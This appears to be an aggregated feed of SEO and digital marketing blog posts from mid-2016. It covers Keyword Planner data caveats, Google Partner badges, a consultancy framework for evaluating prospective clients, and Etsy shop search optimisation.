Guesstimated data aside, you can use Search Console to make sense of actual performance. Map your page impressions to organic (or paid) positions and you’ll get a sense of how accurate the Keyword Planner data is for any given term.

It’s also worth remembering that there are seasonal factors at play with the reported data. Volumes shown are an approximate figure based on 12 months search data. You might get a better idea of more accurate monthly figures if you cross-reference data from with Google Trends, which will show seasonal spikes (February is a big month for flowers).

Screen Shot 2016-06-29 at 10.48.33

Keyword Planner replaced Google’s Keyword Tool and Traffic Estimator about three years ago. Users of the old tools initially complained about missing the broad match and phrase match options. Now, they’re going to miss even more detail around keywords and data.

Proceed with caution, as ever.



from SEO – Search Engine Watch http://ift.tt/294CXmq
via IFTTT

Google Launches New Google Partner Badges & Adds Premier Partner

Google is introducing brand new Partner badges for advertisers and are launching a new Primer Partner status as well. But what is most notable for many is that Google has finally added information to the Google Partners badge which shows that the badge is for advertising.  While it doesn’t show it on the regular view, […]

The post Google Launches New Google Partner Badges & Adds Premier Partner appeared first on The SEM Post.



from The SEM Post http://ift.tt/293dDbu
http://ift.tt/eA8V8J via IFTTT

The Balanced Digital Scorecard: A Simpler Way to Evaluate Prospects

Posted by EmilySmith

[Estimated read time: 10 minutes]

As anyone who's contributed to business development at an agency knows, it can be challenging to establish exactly what a given prospect needs. What projects, services, or campaigns would actually move the needle for this organization? While some clients come to an agency with specific requests, others are looking for guidance — help establishing where to focus resources. This can be especially difficult, as answering these questions often requires large amounts of information to be analyzed in a small period of time.

To address the challenge of evaluating prospective clients and prioritizing proposed work, we’ve developed the Balanced Digital Scorecard framework. This post is the first in a two-part series. Today, we'll look at:

  • Why we developed this framework,
  • Where the concept came from, and
  • Specific areas to review when evaluating prospects

Part two will cover how to use the inputs from the evaluation process to prioritize proposed work — stay tuned!

Evaluating potential clients

Working with new clients, establishing what strategies will be most impactful to their goals... this is what makes working at an agency awesome. But it can also be some of the most challenging work. Contributing to business development and pitching prospects tends to amplify this with time constraints and limited access to internal data. While some clients have a clear idea of the work they want help with, this doesn’t always equal the most impactful work from a consultant's standpoint. Balancing these needs and wants takes experience and skill, but can be made easier with the right framework.

The use of a framework in this setting helps narrow down the questions you need to answer and the areas to investigate. This is crucial to working smarter, not harder — words which we at Distilled take very seriously. Often when putting together proposals and pitches, consultants must quickly establish the past and present status of a site from many different perspectives.

  • What type of business is this and what are their overall goals?
  • What purpose does the site serve and how does it align with these goals?
  • What campaigns have they run and were they successful?
  • What does the internal team look like and how efficiently can they get things done?
  • What is the experience of the user when they arrive on the site?

The list goes on and on, often becoming a vast amount of information that, if not digested and organized, can make putting the right pitch together burdensome.

To help our consultants understand both what questions to ask and how they fit together, we've adapted the Balanced Scorecard framework to meet our needs. But before I talk more about our version, I want to briefly touch on the original framework to make sure we’re all on the same page.

airplane-quote-kaplan-norton.png

The Balanced Scorecard

For anyone not familiar with this concept, the Balanced Scorecard was created by Robert Kaplan and David Norton in 1992. First published in the Harvard Business Review, Kaplan and Norton set out to create a management system, as opposed to a measurement system (which was more common at that time).

Kaplan and Norton argued that "the traditional financial performance measures worked well for the industrial era, but they are out of step with the skills and competencies companies are trying to master today." They felt the information age would require a different approach, one that guided and evaluated the journey companies undertook. This would allow them to better create "future value through investment in customers, suppliers, employees, processes, technology, and innovation."

The concept suggests that businesses be viewed through four distinct perspectives:

  • Innovation and learning – Can we continue to improve and create value?
  • Internal business – What must we excel at?
  • Customer – How do customers see us?
  • Financial – How do we look to shareholders?

Narrowing the focus to these four perspectives reduces information overload. “Companies rarely suffer from having too few measures,” wrote Kaplan and Norton. “More commonly, they keep adding new measures whenever an employee or a consultant makes a worthwhile suggestion.” By limiting the perspectives and associated measurements, management is forced to focus on only the most critical areas of the business.

This image below shows the relations of each perspective:

balanced scorecard graphic .gif

And now, with it filled out as an example:

92105_B.gif

As you can see, this gives the company clear goals and corresponding measurements.

Kaplan and Norton found that companies solely driven by financial goals and departments were unable to implement the scorecard, because it required all teams and departments to work toward central visions — which often weren’t financial goals.

“The balanced scorecard, on the other hand, is well suited to the kind of organization many companies are trying to become... put[ting] strategy and vision, not control, at the center,” wrote Kaplan and Norton. This would inevitably bring teams together, helping management understand the connectivity within the organization. Ultimately, they felt that “this understanding can help managers transcend traditional notions about functional barriers and ultimately lead to improved decision-making and problem-solving.”

At this point, you’re probably wondering why this framework matters to a digital marketing consultant. While it's more directly suited for evaluating companies from the inside, so much of this approach is really about breaking down the evaluation process into meaningful metrics with forward-looking goals. And this happens to be very similar to evaluating prospects.

Our digital version

As I mentioned before, evaluating prospective clients can be a very challenging task. It’s crucial to limit the areas of investigation during this process to avoid getting lost in the weeds, instead focusing only on the most critical data points.

Since our framework is built for evaluating clients in the digital world, we have appropriately named it the Balanced Digital Scorecard. Our scorecard also has main perspectives through which to view the client:

  1. Platform – Does their platform support publishing, discovery, and discoverability from a technical standpoint?
  2. Content – Are they publishing content which combines appropriate blends of effective, informative, entertaining, and compelling?
  3. Audience – Are they building visibility through owned, earned, and paid media?
  4. Conversions – Do they have a deep understanding of the needs of the market, and are they creating assets, resources, and journeys that drive profitable customer action?
  5. Measurement – Are they measuring all relevant aspects of their approach and their prospects’ activities to enable testing, improvement, and appropriate investment?

These perspectives make up the five areas of analysis to work through when evaluating most prospective clients.

1. Platform

Most consultants or SEO experts have a good understanding of the technical elements to review in a standard site audit. A great list of these can be found on our Technical Audit Checklist, created by my fellow Distiller, Ben Estes. The goal of reviewing these factors is of course to “ensure site implementation won’t hurt rankings” says Ben. While you should definitely evaluate these elements (at a high level), there is more to look into when using this framework.

Evaluating a prospect’s platform does include standard technical SEO factors but also more internal questions, like:

  • How effective and/or differentiated is their CMS?
  • How easy is it for them to publish content?
  • How differentiated are their template levels?
  • What elements are under the control of each team?

Additionally, you should look into areas like social sharing, overall mobile-friendliness, and site speed.

If you’re thinking this seems like quite the undertaking because technical audits take time and some prospects won’t be open with platform constraints, you’re right (to an extent). Take a high-level approach and look for massive weaknesses instead of every single limitation. This will give you enough information to understand where to prioritize this perspective in the pitch.

2. Content

Similar to the technical section, evaluating content looks similar to a lightweight version of a full content audit. What content do they have, which pieces are awesome and what is missing? Also look to competitors to understand who is creating content in the space and what level the bar is set at.

Beyond looking at these elements through a search lens, aim to understand what content is being shared and why. Is this taking place largely on social channels, or are publications picking these pieces up? Evaluating content on multiple levels helps to understand what they've created in the past and their audience’s response to it.

3. Audience

Looking into a prospect’s audience can be challenging depending on how much access they grant you during the pitch process. If you’re able to get access to analytics this task is much easier but without it, there are many tools you can leverage to get some of the same insights.

In this section, you’re looking at the traffic the site is receiving and from where. Are they building visibility through owned, earned, and paid media outlets? How effective are those efforts? Look at metrics like Search Visibility from SearchMetrics, social reach, and email stats.

A large amount of this research will depend on what information is available or accessible to you. As with previous perspectives, you're just aiming to spot large weaknesses.

4. Conversion

Increased conversions are often a main goal stated by prospects, but without transparency from them, this can be very difficult to evaluate during a pitch. This means that often you’re left to speculate or use basic approaches. How difficult or simple is it to buy something, contact them, or complete a conversion in general? Are there good calls to action to micro-conversions such as joining an email list? How much different is the mobile experience of this process?

Look at the path to these conversions. Was there a clear funnel and did it make sense from a user’s perspective? Understanding the journey a user takes (which you can generally experience first-hand) can tell you a lot about expected conversion metrics.

Lastly, many companies’ financials are available to the public and offer a general idea of how the company is doing. If you can establish how much of their business takes place online, you can start to speculate about the success of their web presence.

5. Measurement

Evaluating a prospect’s measurement capabilities is (not surprisingly) vastly more accurate with analytics access. If you’re granted access, evaluate each platform not just for validity but also accessibility. Are there useful dashboards, management data, or other data sources that teams can use to monitor and make decisions?

Without access, you’re left to simply check and see the presence of analytics and if there is a data layer. While this doesn’t tell you much, you can often deduce from conversations how much data is a part of the internal team’s thought process. If people are monitoring, engaging, and interested in analytics data, changes and prioritization might be an easier undertaking.

what-you-measure-quote.png

Final thoughts

Working with prospective clients is something all agency consultants will have to do at some point in their career. This process is incredibly interesting — it challenges you to leverage a variety of skills and a range of knowledge to evaluate new clients and industries. It's also a daunting task. Often your position outside the organization or unfamiliarity with a given industry can make it difficult to know where to start.

Frameworks like the original Balanced Scorecard created by Kaplan and Norton were designed to help a business evaluate itself from a more modern and holistic perspective. This approach turns the focus to future goals and action, not just evaluation of the past.

This notion is crucial at an agency needing to establish the best path forward for prospective clients. We developed our own framework, the Balanced Digital Scorecard, to help our consultants do just that. By limiting the questions you’re looking to answer, you can work smarter and focus your attention on five perspectives to evaluate a given client. Once you've reviewed these, you’re able to identify which ones are lagging behind and prioritize proposed work accordingly.

Next time, we’ll cover the second part: how to use the Balanced Digital Scorecard to prioritize your work.

If you use a framework to evaluate prospects or have thoughts on the Balanced Digital Scorecard, I’d love to hear from you. I welcome any feedback and/or questions!


Sign up for The Moz Top 10, a semimonthly mailer updating you on the top ten hottest pieces of SEO news, tips, and rad links uncovered by the Moz team. Think of it as your exclusive digest of stuff you don't have time to hunt down but want to read!



from The Moz Blog http://ift.tt/2938Jx7
via IFTTT

Tuesday 28 June 2016

SEO for Etsy: three tips to improve your store’s search visibility

We live in the age of personalization and customization.

Businesses are trying to find ways to personalize their services to better connect with overarching trends. With the Internet at your disposal, you can have a custom shirt with your dog’s face on it and also get a shirt for your dog with your face on it.

This is just one example of the growing customization culture and interest for the weird that has cropped up, causing an uptick in the amount of Etsy stores out there.

As of 2014, Etsy had 54 million users —up from just 5 million users in 2004. 1.4 million of these Etsy users are active sellers. As more Etsy stores pop up, the space becomes more competitive.

etsy trends

Optimizing your Etsy store and products will help you stay visible whether customers search on Etsy or Google. Here are the fundamental tips and tricks to help enhance your Etsy store and product listings to increase traffic from Google to drive sales.

Etsy keyword research

Having an understanding of your customer’s keyword for your own business is beyond powerful and can help potential clients and fans find you.

Marmalead is a great tool to find keywords for Etsy shops. With it you can type in a tag (or keyword) and see total results or competing products and shops, total views, average views per week, average favorites per week, and much more. F

or a more in-depth explanation of this tool and how to use it for keywords, check out the Ultimate Etsy SEO Guide on Marketing Artfully.

dog beds etsy

Another free option to find keywords for your business – whether you’re a painter or sell custom koozies – is the Google Keyword Planner Tool.

In the Keyword Planner, you can enter one or multiple keywords and Google will tell you a rough estimate of how many searches there are a month, the competition, suggested bid (if you were running an Adwords campaign), and related keywords.

This provides insight as to how people are searching for products related to what you offer.

Let’s say you sell celebrity prayer candles, which I hope you do. Instead of using the keyword “celebrity prayer candles”, you can also try “celebrity candles” or even “funny prayer candles.”

adwords keyword planner

Although “celebrity prayer candles” may be your exact item there is an opportunity to take a top spot for “funny prayer candles” since no shops are currently optimized around it (see screenshot below).

Choosing keywords that have lower search volume, less competition, and are specifically related to your products may be better choices to pull in relevant traffic.

Slight variations in keywords can make all the difference, and having keywords at your disposal is great ammunition, whether you have an Etsy shop or a blog on a WordPress site. You need to know what people are looking for and how to reach them.

Make sure to keep a list of applicable keywords ready whenever you are creating a new product listing.

Optimize your Etsy shop for Etsy and Google… but also your customers

You’ve got those awesome keywords at your disposal. Now it’s time to use them!

The coolest thing keywords can do is show you how people are actually searching for your items. Instead of guessing in the dark, you can use terms that potential customers are using to find your products.

Optimizing both your shop and products are essential to being found on Google and to have people click through. Let’s return to our favorite prayer candle example.

celebrity prayer candles search

Above are the top two results for ‘celebrity prayer candles’. The first result has a meta description that is the proper length and tells you about the business, but the business name is cut off from the page title.

On the other hand, the second result has the business name in the page title (but before the keyword) and the meta description is loaded with too much information and is not succinct.

A page title should be max 65 characters and the meta description should be a maximum of 140 characters. Your page title/store title should quickly summarize what your business does and its name.

A better page title for the first Etsy store might be “Celebrity Prayer Candles | Granny’s Hope Chest”. This title is short, but lets you know what the store offers and what it’s called.

A great tool to preview what your shop title and announcement will look like is the Google SERP Snippet Optimization Tool.

Optimize your Etsy product listings

If you’re trying to move specific product on Etsy then you need to optimize: 1. title description, 2. tags, 3. the first sentence of the product description, 4. categories and materials.

Google pulls this information to create what shows up in search engine result pages, so optimizing properly can help boost traffic on specific products.

The Etsy product title is what Google uses for your listing’s title tag, H1 tag, and image alt tag for each page so make it informative and keyword optimized.

etsy optimise product listings

Scott Taft does a great job of further explaining how your Etsy store translates on Google.

Let’s say you not only create celebrity prayer candles, but you really kick it up a notch and specifically create Steve Buscemi prayer candles.

Yes, there are an average of 30 searches a month for “Steve Buscemi Prayer Candle,” according to Google Keyword Planner. Since Buscemi prayer candles are a little more popular than you would imagine, optimizing your product listing for both Etsy and Google can make a big difference in separating your Steve candles from the rest of the celebrity candle pack.

steve buscemi prayer candle

Again, make sure your product title uses a keyword before your business name and is 65 characters or less.

In this case, if someone is looking for a Steve Buscemi prayer candle then chances are they have a pretty good sense of humor, so your product description should be written to draw a potential customer in with witty copy.

The meta description pulls the first sentence from your product description (as Scott Taft points out in the image below). Remember to make the sentence close to 120 characters and include the same keyword from your page title, if possible.

etsy meta description

Using the keyword ‘Steve Buscemi prayer candle’, I created a keyword-focused page title and meta description that is clear, concise, and may appeal to Buscemi fans. The page title/title description is 55 characters and the product/meta description is 116 characters.

Creating Etsy product titles/page titles and meta/product descriptions that are keyword focused, informative, and fun can help an artist stay visible on Google.

etsy meta descriprion on google

Implementing a keyword strategy may seem confusing and monotonous at first, but it will eventually become routine and is sure to yield results.

Understanding how people search for and see your shop and products is essential to performing well as the customized market grows. When it comes to SEO, try to think like a human first and a search engine second.

No matter what you’re selling, take a few minutes to think about how you would be searching for your product on a search engine and then use the tools and tips to create a strategy. A competitive space isn’t a bad thing when you understand your audience and how to reach them.

Maddie Silverstein is an SEO Analyst at DigitasLBi and a contributor to SEW. You can connect with Maddie on Twitter: @maddigler.



from SEO – Search Engine Watch http://ift.tt/290Zj38
via IFTTT

Social Media Today